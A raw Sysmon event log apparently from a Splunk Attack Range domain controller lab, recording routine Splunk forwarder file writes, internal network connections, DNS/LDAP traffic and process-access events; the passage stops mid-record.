23542300x80000000000000002247075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:36.530{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:37.861{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE50FED6450F6FE7C5A48A2C0AA52D7F,SHA256=7D266CFA46B482B949734442DE964DCC41BDCB2213E72FB084A4079FF74E9F44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:37.640{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82E98592367F08ED553B69DDB999C5CD,SHA256=8B030F7AF8E0B5F4F0044D3E183B2B3A96B78C69DB7EE4CB04C7E5B7E2A84173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:38.890{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28A618DCBE0B89F8F2B76A17E051BDF3,SHA256=575A65DD0D4984A19E37A6603A08DCF0DBDC7BA78FBDF5C7CABD48082D32B957,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:28.171{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60229-false10.0.1.12-8000- 354300x80000000000000002247080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:27.656{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60228-false10.0.1.12-8089- 23542300x80000000000000002247083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:39.921{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=603D04FED21DC98F11DA2645D09B225C,SHA256=9D2F24055D76879868E110AC1F50F066E0C9433B50183C2D352D4A08E50FE3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:40.955{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7C9964433A9FD45B828F49BCB49B020,SHA256=B56E69B759518D8620B3ED4BD3E4E79AA7D613E69AB33FAC0472753F0134214C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:40.687{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C838EA75AAFAA6AB554D242FB87165B9,SHA256=36166F5591759744CCDD0860F09E20479B3C28986C144038157A9B784E177A45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:41.984{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C5B91E8617A1D47E8122C8F803D026,SHA256=D7BFB2FB298434A6F05413E625D334611CB7608CBB822CD4441C607B422C5052,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:32.327{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51415- 23542300x80000000000000002247087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:42.218{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA6439B3CA9136BAE9022ABE4095A2D1,SHA256=25B5B64E5998652AF9527B4A27EEC4E09D24C285661183832EE7B23B274C6BF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:33.342{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51415- 354300x80000000000000002247090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:33.234{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60230-false10.0.1.12-8000- 23542300x80000000000000002247089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:43.015{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE4F514D6CE8BE2154D2F6BD4677F194,SHA256=4DF509466888925E48DB0D29992ED43F371CE9D0B2C29E6207BDF112F504015A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:44.733{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=225C3C3F22A002A5E46373DB5BA9FA6B,SHA256=4D5CB3DFF97389B577F4370F876C64471FD017E1D806E0C8B4FCA1F07D54564E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:44.015{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=897E5AAD6307CFB4074D5609A1763C39,SHA256=CBC88E4CA1F3F7AB298A921075A40762DD8856ED8261730DCB09D9119EC95BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:45.064{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D151ACD850304428AA2F6967AE7B56,SHA256=CACC1DECDE2977253D8CB97D90646FCBA87E0D78848545E2FE67A40C69C80633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:46.093{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=738D359C35AB0ECB4AC688F6E1315196,SHA256=BBF91AAE4DE6BF8641B951B0F7DE439C371C595F4E0BA126B48A82F8F0465859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:47.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7118722DADA81CEE929B664E403DDFF6,SHA256=6A15E6B315852ED7828631B36CD47B93657F8B1681306290573A4C015032C28D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:38.249{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60231-false10.0.1.12-8000- 23542300x80000000000000002247098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:48.158{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6551157FF085152BD84A9219432F7BF7,SHA256=A10DFFCB254651ADE086E4A3895E3575D3FF6C18D6F0934356DF7B08E31CA0A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:48.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A21C7E1B3E5AE638190FBB6DA0C11F60,SHA256=281FB8D13C076461E7A7610711F5189A8CEE3C5A4F237FB0DFE8266C2FED2B91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:49.187{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94449D4B1FEDD25F1A430FD093BAC5FF,SHA256=84D7A449A705EF8FC86980FEA1B50772BE8B83B283F0D1DCDE4A9DFC68B71868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:50.268{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56CE79F50EC505FAA6B3E30B5CF09AE9,SHA256=335AFFA712277DB49C72677E2BC23CC1DC740224E28F5ACA838C25B9A1BDE53B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:50.249{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B36A5555D02AC21AC1FCE6337D63BBC,SHA256=1D751DA248E822CFCD1510ED6C35FA111B13F9B771C1655B997894BA095E306F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:51.268{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46476EC3A31413C9AA385711CE19FEBF,SHA256=3152EE7E4500990AE7D651D8EC0531A0F0AD17D53C413E3A988EE1EBFB1ECCB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:40.362{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-61836-true2001:503:c27:0:0:0:2:30j.root-servers.net53domain 23542300x80000000000000002247108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:52.687{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=995CF9B1DCB977FA586C856B16E2A89A,SHA256=6111997399E15C85DCAE49BE9AE0091D80254DDB44B3C12AF3B6C87161277047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:52.296{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=584EBF82272FD52ABF00D91CD841573B,SHA256=59502E38F28D6A55BFC7C6201A3F36FEF7CD9EEC1EAF8477D67E5917E53AADAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:41.031{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60232-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002247105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:41.031{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60232-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000002247110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:53.327{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F1D5B04E2793886E43CCEAB2F36ED5,SHA256=667867D90FEF19359699BD252568F67693D0F7CB79F82C0A36825721F03A7B66,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:42.780{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55768- 23542300x80000000000000002247122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.484{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=511D4CF86E230030C46CD8304DF1AFEB,SHA256=4A1970280E2652858D88F50874094A5E0CB31253A0FD2C52973841184A80970B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ECE-603E-17AB-00000000AD01}12320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6ECE-603E-17AB-00000000AD01}12320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.421{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ECE-603E-17AB-00000000AD01}12320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.422{05ADC7E1-6ECE-603E-17AB-00000000AD01}12320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002247113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.364{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DEAE83022EB3A0ACE1D4F0409D0C77,SHA256=80115FFE8260E8F33AAF2EEC210B05BE64B794338B713CCA9FA89E225BE4C810,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:43.795{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55768- 354300x80000000000000002247111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:43.265{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60233-false10.0.1.12-8000- 10341000x80000000000000002247142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.843{05ADC7E1-6ECF-603E-19AB-00000000AD01}33208516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ECF-603E-19AB-00000000AD01}3320C:\Program 